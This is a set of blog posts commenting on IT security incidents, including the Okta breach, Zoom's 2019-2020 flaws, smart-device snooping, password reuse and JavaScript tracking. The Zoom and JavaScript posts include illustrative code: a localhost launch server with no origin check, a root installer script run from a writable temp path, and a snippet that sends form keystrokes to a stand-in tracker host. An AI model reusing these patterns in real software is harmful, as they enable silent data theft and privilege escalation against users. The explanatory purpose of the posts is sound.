
Old Views For Today's News

Here's a blog post I wrote back in 2015 for my then-employer that I was reminded of while recording the latest episode of the Roll For Enterprise podcast. Since the original post no longer seems to be available via the BMC web site, I assume they won't mind me reposting it here, with some updated commentary.
xkcd, CIA

There has been a certain amount of excitement in the news media, as someone purportedly associated with ISIL has taken over and defaced US Central Command's Twitter account. The juxtaposition with recent US government pronouncements on "cyber security" (ack) is obvious: Central Command’s Twitter Account Hacked…As Obama Speaks on Cybersecurity.

The problem here is the usual confusion around IT in general, and IT security in particular. See for instance CNN:

The Twitter account for U.S. Central Command was suspended Monday after it was hacked by ISIS sympathizers -- but no classified information was obtained and no military networks were compromised, defense officials said.

To an IT professional, even one without a specific security background, this is kind of obvious.

Penny Arcade, Brains With Urgent Appointments

However, there is a real problem here: IT professionals have a blind spot of their own. They tend not to think of things like Twitter accounts when securing IT infrastructure, and that oversight can expose organisations to serious problems.

One way this can happen is through credential re-use, and credential leaking in general. Well-run organisations will use secure password-sharing services such as LastPass, but without IT guidance, teams might instead opt to store credentials in a spreadsheet, as we now know happened at Sony. If someone got their hands on even one set of credentials, what other services might they be able to unlock?

The wider issue is the notion of perimeter defence. IT security to date has been all about securing the perimeter - firewalls, DMZs, NAT, and so on. Today, though, what is the perimeter? End-user services like Dropbox, iCloud, or Google Docs, as well as multi-tier enterprise applications, span back and forth across the firewall, with data stored and code executed both locally and remotely.

I don't mean to pick on Sony in particular - they are just the most recent victims - but their experience has shown once and for all that focusing only on the perimeter is no longer sufficient. The walls are porous enough that it is no longer possible to assume that bad guys are only outside. Systems and procedures are needed to detect anomalous activity inside the network, and once that occurs, to handle it rapidly and effectively.

This cannot happen if IT is still operating as "the department of NO", reflexively refusing user requests out of fear of potential consequences. If the IT department tries to ban everything, users will figure out a way to go around the restrictions to achieve their goals. The danger then is that they make choices which put the entire organisation and even its customers at risk. Instead, IT needs to engage with those users and find creative, novel ways to deliver on their requirements without compromising on their mandate to protect the organisation.

While corporate IT cannot be held responsible for the security of services such as Twitter, they can and should advise social-media teams and end-users in general on how to protect all of their services, inside and outside the perimeter.

There are still a lot of areas where IT is focused on perimeter defence. Adopting Okta or another SSO service is not a panacea; you still need to consider what happens when (not if) someone gets inside the first layer of defence. How would you detect them? How would you stop them?

The Okta breach has also helpfully provided an example of another important factor in security breaches: comms. Okta's comms discipline has not been great, reacting late, making broad denials that they later had to walk back, and generally adding to the confusion rather than reducing it. Legislation is being written around the world (with the EU as usual taking the lead) to mandate disclosure in situations like these, which may focus minds — but really, if you're not sufficiently embarrassed as a security provider that a bunch of teenagers were apparently running around your network for at least two weeks without you detecting them, you deserve all the fines you're going to get.

These are no longer purely tech problems. Once you get messy humans in the mix, the conversation changes from "how many bits of entropy does the encryption algorithm need" to "what is the correct trade-off between letting people get their jobs done and ensuring a reasonable level of security, given our particular threat model". Working with humans means communicating with them, so you’d better have a plan ready to go for what to say in a given situation. Hint: blanket denials early on are generally a bad idea, leaving hostages to fortune unnecessarily.

Have that plan ready before you need it (including what you may be legally mandated to disclose, and on what timeframe), and avoid losing your customers’ trust. Believe me, that’s one sort of zero trust that you don’t want!

The Thing With Zoom

Zoom was having an excellent quarantine — until it wasn’t.

This morning’s news is from Bloomberg: Zoom Sued for Fraud Over Privacy, Security Flaws. But how did we get here?

Here is what’s interesting about the Thing with Zoom: it’s an excellent example of a company getting it mostly right for its stated aims and chosen target market — and still getting tripped up by changing conditions.

To recap, very quickly: with everybody suddenly stuck home and forbidden to go to the office, there was an equally sudden explosion in video calling — first for purely professional reasons, but quickly spreading to virtual happy hours, remote karaoke, video play dates, and the like. Zoom was the major beneficiary of this growth, with daily active users going from 10 million to over 200 million in 3 months.

One of the major factors that enabled this explosive growth in users is that Zoom has always placed a premium on ease of use — some would argue, at the expense of other important aspects, such as the security and privacy of its users.

There is almost always some tension between security and usability. Security features generally involve checking, validating, and confirming that a user is entitled to perform some action, and asking them for permission to take it. Zoom generally took the approach of not asking users questions which might confuse them, and removing as much friction as possible from the process of getting users into a video call — which is, after all, the goal of its enterprise customers.

Doing The Right Thing — Wrong

I cannot emphasise enough that this focus on ease of use is what made Zoom successful. I think I have used every alternative, from the big names like WebEx (even before its acquisition by Cisco!), to would-be contenders like whatever Google’s thing is called this week, to has-beens like Skype, to also-rans like BlueJeans. The key use case for me and for Zoom’s other corporate customers is, if I send one of my prospects a link to a video call, how quickly can they show up in my call so that I can start my demo? Zoom absolutely blew away the competition at this one crucial task.

Arguably, Zoom pushed their search for ease of use a bit too far. On macOS, if you click on a link to a Zoom chat, a Safari window will open and ask you whether you want to run Zoom. This one click is the only interaction that is needed, especially if you already have Zoom installed, but it was apparently still too much — so Zoom actually started bundling a hidden web server with their application, purely so that they could bypass this alert.
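
The mechanism, as described in the researcher's disclosure at the time, looked roughly like the sketch below: a tiny HTTP server bound to the loopback interface, which the meeting page can poke to launch the client directly, so the browser's confirmation prompt never fires. To be clear, this is my own illustration of the reported pattern, not Zoom's actual code; the port is the one widely reported in the 2019 disclosure, and the launch flag is invented.

```typescript
// Sketch of a localhost "launch helper" (illustrative, not Zoom's code).
import { createServer } from "node:http";
import { execFile } from "node:child_process";

const PORT = 19421; // the port widely reported in the 2019 disclosure

createServer((req, res) => {
  const url = new URL(req.url ?? "/", `http://127.0.0.1:${PORT}`);
  if (url.pathname === "/launch") {
    const meetingId = url.searchParams.get("confid") ?? "";
    // Requests to localhost are not origin-restricted, so ANY web page the
    // user visits can trigger this, with no confirmation prompt at all.
    execFile("/Applications/zoom.us.app/Contents/MacOS/zoom.us",
             [`--join=${meetingId}`]); // hypothetical flag, for illustration
    res.writeHead(204).end();
  } else {
    res.writeHead(404).end();
  }
}).listen(PORT, "127.0.0.1");
```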

Sneaking a web server onto users’ systems was bad enough, but worse was to come. First of all, Zoom’s uninstall routine did not remove the web server, which remained behind and was capable of reinstalling the Zoom client without user interaction. But what got the headlines was the vulnerability that this combination enabled: a malicious website could join visitors to a Zoom conference, and since most people had their webcam on by default, active video would leak to the attacker.

This behaviour was so bad that Apple actually took the unprecedented step of issuing an operating system patch to shut Zoom down.

Problem solved?

This hidden-web-server saga was a preview of what we are seeing now. Zoom had over-indexed on its customers, namely large corporations who were trying to reach their own customers. The issue of being forcibly and invisibly joined to a Zoom video conference simply by visiting a malicious website did not affect those customers – but it did affect Zoom’s users.

The distinction is one that is crucial in the world of enterprise software procurement, where the person who signs the cheque is rarely the one who will be using the tool. Because of this disconnect, vendors by and large optimise for that economic buyer’s requirements first, and only later (if at all) on the actual users’ needs.

With everyone locked up at home, usage of Zoom exploded. People with corporate accounts used them in the evening to keep up with their social lives, and many more signed up for the newly-expanded free tier. This new attention brought new scrutiny, and from a different angle from what Zoom was used to or prepared for.

For instance, it came to light that the embedded code that let users log in to Zoom on iOS with their Facebook credentials was leaking data to Facebook even for users without a Facebook account. Arguably, Zoom had not done anything wrong here; as far as I can tell, the leakage was due to Facebook’s standard SDK grabbing more data than it was supposed to have, in a move that is depressingly predictable coming from Facebook.

In a normal circumstance, Zoom could have apologised, explained that they had moved too quickly to enable a consumer feature that was outside their usual comfort zone without understanding all the implications, and moved on. However, because of the earlier hidden-web-server debacle, there was no goodwill for this sort of move. Zoom did act quickly to remove the offending Facebook code, but worse was to come.

Less than a week later, another story broke, claiming that Zoom is Leaking Peoples' Email Addresses and Photos to Strangers. Here is where the story gets really instructive.


This "leak" is due to the sort of strategy tax that was almost inevitable in hindsight. Basically, Zoom added a convenience feature for its enterprise customers, called Company Directory, which assumes that anyone sharing the same domain in their email address works for the same company. In line with their guiding principle of building a simple and friction-free user experience, this assumption makes it easier to schedule meetings with one’s colleagues.

The problem only arose when people started joining en masse from their personal email accounts. Zoom had excluded the big email providers, so that people would not find themselves with millions of "colleagues" just because they had all signed up with Gmail accounts. However, they had not made an exhaustive list of all email providers, and so users found themselves with "colleagues" who simply happened to be customers of the same ISP or email provider. The story mentioned Dutch ISPs like xs4all.nl, dds.nl, and quicknet.nl, but the same issue would presumably apply to all small regional ISPs and niche email providers.
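
In pseudocode terms, the flawed logic probably amounted to something like the following sketch. This is my own reconstruction for illustration only: the function names and the provider list are invented, and Zoom's real implementation is not public.

```typescript
// Illustrative reconstruction of "same email domain == same company" logic.
const PUBLIC_PROVIDERS = new Set([
  "gmail.com", "yahoo.com", "hotmail.com", "outlook.com",
  // Any such list is necessarily incomplete: xs4all.nl, dds.nl, quicknet.nl
  // and thousands of other small providers are missing from it.
]);

function emailDomain(address: string): string {
  return address.split("@")[1]?.toLowerCase() ?? "";
}

// Treat two users as colleagues if they share a non-public email domain.
function areColleagues(a: string, b: string): boolean {
  const domain = emailDomain(a);
  return domain !== "" &&
         domain === emailDomain(b) &&
         !PUBLIC_PROVIDERS.has(domain); // the flawed assumption lives here
}

// Works as intended for two @example-corp.com addresses, but also matches
// two strangers who happen to use the same small ISP:
console.log(areColleagues("alice@xs4all.nl", "bob@xs4all.nl")); // true
```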

Ordinarily, this sort of "privacy leak" is a storm in a teacup; it’s no worse than a newsletter where all the names are in the To: line instead of being in Bcc:. However, by this point Zoom was in the full glare of public attention, and the story blew up even in the mainstream press, outside of the insular tech world.

Now What?

Zoom’s CEO, Eric Yuan, issued a pretty comprehensive apology. I will quote the key paragraphs below:

First, some background: our platform was built primarily for enterprise customers – large institutions with full IT support. These range from the world’s largest financial services companies to leading telecommunications providers, government agencies, universities, healthcare organizations, and telemedicine practices. Thousands of enterprises around the world have done exhaustive security reviews of our user, network, and data center layers and confidently selected Zoom for complete deployment.

However, we did not design the product with the foresight that, in a matter of weeks, every person in the world would suddenly be working, studying, and socializing from home. We now have a much broader set of users who are utilizing our product in a myriad of unexpected ways, presenting us with challenges we did not anticipate when the platform was conceived.

These new, mostly consumer use cases have helped us uncover unforeseen issues with our platform. Dedicated journalists and security researchers have also helped to identify pre-existing ones. We appreciate the scrutiny and questions we have been getting – about how the service works, about our infrastructure and capacity, and about our privacy and security policies. These are the questions that will make Zoom better, both as a company and for all its users.

We take them extremely seriously. We are looking into each and every one of them and addressing them as expeditiously as we can. We are committed to learning from them and doing better in the future.

It’s too early to say what the long-term consequences for Zoom will be, but this is a good apology, and a reasonable set of early moves by the company to repair its public image. To be clear, the company still has a long way to go, and to succeed, it will need to rebalance its exclusive focus on usability to be much more considerate of privacy and security.

For instance, there were a couple of zero-day bugs found in the macOS client (since patched in Version 4.6.9) which would have allowed for privilege escalation. These particular flaws cannot be exploited remotely, so they would require would-be attackers to have access to the operating system already, but it’s still far from ideal. In particular, one of these bugs took advantage of some shortcuts that Zoom had taken in its installer, once again in the name of ease of use.

Installers on macOS have the option of running a "preflight" check, where they verify all their prerequisites are met. After this step, they will request confirmation from the user before running the installer proper. Zoom’s installer actually completed all its work in this preflight step, including specifically running a script with root (administrator) privileges. This script could be replaced by an attacker, whose malicious script would then be run with those same elevated privileges.
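
Reduced to its essentials, the anti-pattern is executing whatever happens to sit at a predictable, user-writable path with elevated privileges. Here is a minimal sketch of that pattern (my own illustration with an invented path, not Zoom's actual installer code):

```typescript
// Illustrative sketch of the installer anti-pattern, not Zoom's actual code.
import { execFileSync } from "node:child_process";

// Hypothetical staging location; the point is that a normal, unprivileged
// user can write to it.
const PREFLIGHT_SCRIPT = "/tmp/installer-staging/runwithroot";

// If the installer executes this as root, any local user who can write to
// the staging directory can swap the script between unpack and execution,
// and their code inherits root privileges. The fix is to verify the
// script's ownership and signature first, or to stage it in a directory
// that only root can write to.
execFileSync(PREFLIGHT_SCRIPT, [], { stdio: "inherit" });
```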

Personally I hope that Zoom figures out a way to resolve this situation. The user experience is very pleasant (even after installation!), and given that I work from home all the time — not just in quarantine — Zoom is a key part of my work environment.

Lessons To Learn

1: Pivoting is hard

Regardless of the outcome for Zoom, though, this is a cautionary tale in corporate life and communications. Zoom was doing everything right for its previous situation, but that exclusive focus made it difficult to react when the situation changed. The pivot from corporate enterprise users to much larger numbers of personal users is an opportunity for Zoom if they can monetise this vastly expanded user base, but it also exposes them to a much-changed environment. Corporate users are more predictable in their environments and routines, and in the way they interact with apps and services. Home users will do all sorts of unexpected things and come from unexpected places, exposing many more edge cases in developers’ assumptions.

Companies should not assume that they can easily "pivot" to a whole new user population, even one that is attractively larger and more promising of profits, without making corresponding changes to core assumptions about how they go to market.

2: A good reputation once lost is hard to regain

A big part of Zoom’s problem right now is that they had squandered their earlier goodwill with techies when they hid a web server on users’ machines. Without that earlier situation, they might have been able to point out that many of the current problems are on the level of tempests in teacups — bugs to be sure, which need to be fixed, but hardly existential PROBLEMS.

As it happened, though, the Internet hive mind was all primed to think the worst of Zoom, and indeed actively went looking for issues once Zoom was in the glare of the spotlight. In this situation, there is not much to be done in the short term, apart from what Zoom actually did: apologise profusely, promise not to do it again, and attempt to weather the storm.

One move I have not yet seen them make which would be very powerful would be to hire a well-known security expert with a reputation for impartiality. One part of their job would be to act as figurehead and lightning conductor for the company’s security efforts, but an equally important part would be as internal naysayer: the VP of Nope, someone able to say a firm NO to bad ideas. Hiding a web server? Bad idea. Shortcutting the installer? Bad idea. Assuming everyone with an email address not on a very short list of mega-providers is a colleague of everyone else with the same email domain? Bad idea.


UPDATE: Showing how amazingly prescient this recommendation was, shortly after I published this post, Alex Stamos announced that he was joining Zoom to help them "build up their security program".


Alex Stamos is of course the ex-CSO at Facebook, who since departing FB has made something of a name for himself by commenting publicly about security and privacy issues. As such, he’s pretty much the perfect hire: high public profile, known as an impartial expert, and deeply experienced specifically in end-user security issues, not just the sort of enterprise aspects which Zoom had previously been focusing on.

I will be watching his and Zoom’s next moves with interest.


3: Bottom line: build good products

Most companies need to review both security and usability — but it’s probably worth noting that a good product is the best way of saving yourself. Even in a post-debacle roundup of would-be alternatives to Zoom, Zoom still came out ahead, despite being penalised for its security woes. They still have the best product, and, yes, the one that is easiest to use.

But if you get the other two factors right, you, your good product, and your long-suffering comms team will all have an easier life.


🖼️ Photos by Allie Smith on Unsplash

The Internet of Unwelcome Gifts

It’s that time of year when many of us are out buying gifts for ourselves or others – or if you’re tight like me, waiting for the sales in the New Year to buy those big-ticket items. Ahem. Regardless, please do not buy IoT / "smart" devices as gifts for people you care about.

Here’s the thing: at this point in time, most people who want a dedicated assistant-in-a-can device already have one. If they don’t own one already, it may be because they realise they will hardly use it – most of these things are only ever used to play music and maybe set a timer. The first many of us knew about Amazon’s efforts to sell Alexa skills for actual cash money was when they missed their revenue forecast… badly. How badly did they miss? Well, against what I would have thought was a pretty conservative target by Amazon’s standards of $5M, they achieved… $1.4M. That’s 28% attainment, also known in sales circles as "pack up your desk and get out – and be quick about it, I already called Security". In other words, very few people are using Skills at all, and basically none are using for-pay skills.

Of course there are any number of surreptitiously "smart" devices. For instance, these days it is pretty much impossible to buy a consumer TV without an operating system powerful enough to connect to the Internet over wifi and run streaming-video apps. This also means they are powerful enough to snoop on users’ behaviour. You might think this is not too bad – after all, YouTube already knows exactly which cute cat videos you watched – but these days, the state of the art is capturing whatever is displayed on screen, and trying to run analytics on that. If you watch home videos or display your photos, well, the privacy policy you clicked through when you set up the TV says it’s okay for the company to own those now. This is why even staid Consumer Reports is offering advice to turn off snooping features in smart TVs — and yes, they called it "snooping", not me.

If you think TVs are bad, other categories are even worse; see this IEEE report that calls out security risks of drones, vibrators, and children’s toys.

All of this means that there is a good chance that your possible gift recipient, especially if they are technically inclined, considered and rejected smart devices for security reasons. In case you think I’m just a lone crank over here in my tinfoil hat, it’s worth noting that the FBI issued notices about securing smart TVs around Black Friday, while the French government just sent out a warning about an internet-connected food processor.

At least someone with some technical skills might have a chance of heading off the snooping at the network edge with something like a Pi-Hole. Definitely don’t buy anything with an Internet connection for your Muggle friends and relatives!

This is the sort of thing that Mozilla’s excellent Privacy Not Included project is designed to highlight. Note that this is not a blanket anti-tech position; if you browse over to the Privacy Not Included site, there are a ton of "smart" devices that are not creepy. But then there are the others, such as the infamous Ring camera, which manages a hat trick of terrible security, accommodation with a surveillance-driven police state, and enablement and reinforcement of racist tendencies.

In this context, Apple’s announcement that they are joining forces with Amazon, Google, and the Zigbee Alliance to establish a new, more secure and interoperable IoT standard may be a hopeful sign that the Wild West era of ill-considered experimentation in IoT is coming to an end – or it may be a well-intentioned standard that simply ends up gathering dust on a shelf in Cupertino.

Turn up the heating, I’m freezing!
I’m sorry Dave, I can’t let you do that.

Regardless, don’t buy any devices that are too smart for their own good – or more importantly, yours. If there is no good reason for a thing to be "smart", then stick to the dumb version: it no doubt works better today, and won’t be obsolete tomorrow when the vendor goes out of business or simply terminates support for that product line.

Don't Blame The User

It would be easy to write a blog post about every single XKCD strip, so I try not to – but the latest one drives at something very interesting in infosec.

Some of the default infosec advice that is always given out is to avoid reusing passwords on different sites. This is good advice as far as it goes, but it misses one key aspect. Too many sites force people to create accounts for no good reason ("create an account to use our free wifi"), and so people use throwaway passwords, and reuse them across many of these low-risk sites. In the XKCD example above, if someone cracks the Smash Mouth message boards, maybe they get to reuse the password to gain access to the Limp Bizkit boards, but ideally they won’t get access to Venmo, because that not only has a different, higher-grade password, but is also secured by 2FA¹.

The good news is that it’s becoming easier than ever to generate secure passwords and avoid reusing them. If you’re an Apple user, the iCloud Keychain is built right into both iOS and macOS, and will generate and remember secure passwords for you, securing them with FaceID or TouchID. There are of course any number of third-party options as well, but the point is that security needs to be easy. People who care about security will sign up for Have I Been Pwned; general users just trying to get through their day will not.
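
Under the hood, generating a password is the easy part, and it is worth seeing how little code it takes. Here is a minimal sketch using the Web Crypto API, which is available in browsers and in modern Node; a real password manager would add rejection sampling to remove the slight modulo bias, plus secure per-site storage.

```typescript
// Minimal password generation with the Web Crypto API (sketch).
const ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*";

function generatePassword(length = 20): string {
  const values = new Uint32Array(length);
  crypto.getRandomValues(values); // cryptographically secure, unlike Math.random()
  return Array.from(values, (v) => ALPHABET[v % ALPHABET.length]).join("");
}

// Each call produces a fresh, strong password: generate one per site, let
// the manager remember it, and reuse stops being an issue.
console.log(generatePassword());
```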

The first priority is making it work at all, the second is making it usable; regrettable as it may be, security comes after those primary concerns. The easier it is for users to do the right thing, the more likely it is that they will do it. Browbeating them after a breach because they didn’t jump through precisely the right hoops in exactly the right sequence is not helpful. What will help is putting the effort into helping them up front, including in the service design itself.

Previously, previously.


  1. Note, I have no idea whether Venmo actually supports 2FA; not being in the US, I don’t / can’t use it. For "Venmo", read "online banking" or whatever other high-security example. 

Future Trends In Due Diligence

This story is amazing on so many levels. International banking intrigue on the Eurostar, court cases, huge companies’ deals in jeopardy… It has everything!

The whole story (and associated court case) stems from an episode of shoulder surfing on Eurostar. The Lazard banker working on Iliad’s attempted takeover of T-Mobile US was not paying attention to the scruffy dude sitting beside him on the train. Unfortunately for him, that scruffy dude worked for UBS, and was able to put two and two together (with the assistance of a colleague).

If the Lazard banker had traded on this information, it would have been considered insider trading. However, the judge determined that the information gathered by shoulder-surfing was not privileged, as the UBS banker could not be considered an "insider" (warning, IANAL).

This is why you do not conduct sensitive conversations in trains, airport lounges, and the like. Also, if you are working on information this momentous, one of those screen protectors is probably a worthwhile investment. I have seen and overheard so much information along these lines, although unfortunately I am never in a position to take advantage of any of it.

As usual, humans are the weakest link in any security policy. This is particularly humorous since today I found that, at some point over the Easter break, corporate IT has disabled iCloud Drive on our Macs. Dropbox and my personal login to Google Drive / File Stream / whatever-it’s-called-this-week all still work though…

A particularly paranoid form of security audit would include shadowing key employees on their commutes or business travel to see how well company information is protected. But that will probably never happen: it’s much easier just to install annoying agents on everybody’s machines, tick that box, and move on.


Image is a still from this excellent video by ENISA.

The Internet of (Insecure) Things

Back in 2014, I wrote an article entitled Why the Blinking Twelves is an Internet of Things problem in the making. If you’re not familiar with the idiom of the "blinking twelves", allow me to enlighten you:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.
Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be showing the "blinking twelves" instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.
One of the most frustrating things for techies about the "blinking twelves" was that nobody else seemed to care or even notice the problem that was driving them nuts. How could people not see the blinking twelves all around them, and do something about them?
It took Windows for the problem to become obvious. Windows computers brought a much higher level of technological complexity: the computer needed regular maintenance, and people rapidly realised that updates and patches were required at regular intervals if their computers were to remain functional and secure.
The problem that we are facing is that technology has already begun to spread beyond the desktop. Even the most technophobic now carry a phone that is "smart" to a greater or lesser degree, and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

In the three years since I wrote that article, the number of Internet-enabled devices has simply exploded.

I know, it’s from Business Insider, take it with a large grain of salt - but the trend is unarguable.

Here’s the problem: all of those Internet-enabled Things are cheap, and therefore based on existing components, including software. Most software, at least below the level of the specialised RTOSen found in nuclear power plants and the like, is built around the assumption of regular maintenance and updates provided by knowledgeable operators. However, once these Things are deployed in the field, where "in the field" often means the home or office of people who are not IT professionals, it is a given that they will not receive that level of care.

When something like KRACK hits, the odds are good that the manufacturers of many devices will already have disappeared without providing patches. Even for devices from more stable vendors who do provide ongoing support, maybe the device is obsolete and has been replaced by newer versions with incompatible architectures. But even supposing that all the stars align and a patch is available, it will still not be deployed widely - because of the "blinking twelves" problem. Non-specialist owners will not know or care to update their devices, and so the cycle continues.

Our only hope is that we are saved by our devices' obsolescence, as the lack of updates eventually prevents them from functioning at all. Maybe this won’t be the final straw, but soon enough the figleaf in every click-through agreement about the software being "provided as is" and "no warranty of merchantability or fitness for purpose" will be ripped away, in favour of the sorts of consumer protection regulations that these same devices would be subject to if they were not Internet-enabled.

The alternative is that in the Smart Home of the Future that we keep being promised, troubleshooting steps really will require us to close all the windows, exit, and start what we were doing all over again.

Me, I’ll move to a cabin in the woods.


Photo by Heather Zabriskie on Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaffling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
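
It takes depressingly little code to do this. A minimal sketch of the technique (my own illustration; the collection endpoint is invented):

```typescript
// Sketch: exfiltrating form fields as the user types (illustrative only).
document.querySelectorAll<HTMLInputElement>("input").forEach((field) => {
  field.addEventListener("input", () => {
    // Fires on every keystroke or auto-fill: the partially-typed value
    // leaves the page long before any Submit button is pressed.
    navigator.sendBeacon(
      "https://tracker.example/collect", // hypothetical endpoint
      JSON.stringify({ name: field.name, value: field.value }),
    );
  });
});
```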

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the "egg" had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, maintainers of a system will just throw up their hands, declare a system officially unmaintainable, and move to something else. This process is called "End of Life", and is supposed to coincide with users also moving to the new supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, "security" falls under the heading of "risk avoidance"; a nebulous event in the future, that may become less probable if the investment is made.

For those who have not dealt with many finance people, as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they are going to be very unhappy with any proposed investment on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, which hit unpatched and end-of-life systems including Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Vice-versa, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on them and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Vice versa, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

